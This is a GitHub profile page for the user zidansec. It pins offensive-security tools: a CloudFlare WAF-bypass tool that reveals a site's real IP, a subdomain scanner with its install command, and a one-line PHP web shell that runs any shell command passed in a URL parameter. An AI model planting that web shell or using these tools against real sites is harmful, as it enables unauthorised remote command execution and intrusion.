Skip to content
View zidansec's full-sized avatar
💫
Ordinary people
💫
Ordinary people

Organizations

@subangxploits
Block or Report

Block or report zidansec

Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
zidansec/README.md



Designs, coding, and writes about IT Security, ethics, research, and dev. This site is where I share my experiences.






Pinned Loading

  1. CloudPeler CloudPeler Public

    CrimeFlare is a useful tool for bypassing websites protected by CloudFlare WAF, with this tool you can easily see the real IP of websites that have been protected by CloudFlare. The resulting infor…

    PHP 1.3k 167

  2. subscan subscan Public

    Subscan is a simple tool for subdomain scanner, it can scan subdomains fast.

    PHP 33 8

  3. Smallest PHP WebShell Smallest PHP WebShell
    1
    <?=`$_GET[x]`?> // Exploit: ?x=ls
  4. Subscan Install Subscan Install
    1
    sudo wget https://raw.githubusercontent.com/zidansec/subscan/master/subscan -O /bin/subscan && sudo chmod +x /bin/subscan